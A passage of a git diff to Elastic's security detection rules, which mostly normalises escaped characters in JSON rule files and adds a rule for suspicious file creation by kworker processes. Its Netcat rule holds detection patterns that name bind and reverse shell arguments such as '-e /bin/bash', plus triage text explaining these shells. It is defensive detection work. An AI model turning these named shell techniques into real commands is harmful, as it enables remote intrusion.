malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json index 0f0170ad2e4..5b8a489a53d 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_108.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json index a7f0d77559f..acfd079ea22 100644 --- a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_109.json @@ -16,7 +16,7 @@ "license": "Elastic License v2", "name": "File Transfer or Listener Established via Netcat", "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\"\u003e\",\"\u003c\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", "references": [ "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json index 0042b5e9675..dec413237ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json +++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_1.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json index d1a15a1affc..b5a2d3142a6 100644 --- a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json +++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_2.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -112,7 +112,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json new file mode 100644 index 00000000000..a2781b34d55 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_1.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation via Kworker", + "query": "file where event.action == \"creation\" and process.name : \"kworker*\" and not (\n process.name : \"kworker*kcryptd*\" or file.path : (\"/var/log/*\", \"/var/crash/*\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json index 9a9a7fded2b..49b648a0fe0 100644 --- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_1.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json index 9a8d4a3b2c7..d51112f1aff 100644 --- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_2.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -101,7 +101,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json index 653607c8482..9e97e2e2911 100644 --- a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_3.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -102,7 +102,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json index d1ab60975a6..8364968deb6 100644 --- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json index 3ecbb788d44..8da58bea28c 100644 --- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json index d2825a7722f..166ec244cec 100644 --- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_3.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json index 91d7a62a47c..880410515e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json index d1089dbcb8b..7689bd0d334 100644 --- a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_5.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json index 852204bfe43..1ad4eed2144 100644 --- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json +++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json index d623f7c361a..60bc98c86d2 100644 --- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json +++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_2.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json index 54c859fbff8..0708cc1d574 100644 --- a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json +++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_3.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json index 5c43ebfe595..504ab81b585 100644 --- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_103.json @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json index 7af05eda06f..aa91fcdbd9f 100644 --- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_104.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json index 7a8824d653d..edd89675fcb 100644 --- a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_105.json @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json index fb401f42d77..9a22d52e65e 100644 --- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -71,7 +71,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json index 5663f683d30..0ffb2280179 100644 --- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_2.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json index 34be8727658..56b203e3edc 100644 --- a/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json +++ b/packages/security_detection_engine/kibana/security_rule/afd04601-12fc-4149-9b78-9c3f8fe45d39_3.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -82,7 +82,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json index 1f983a5d9ae..bd452eb385a 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_1.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": 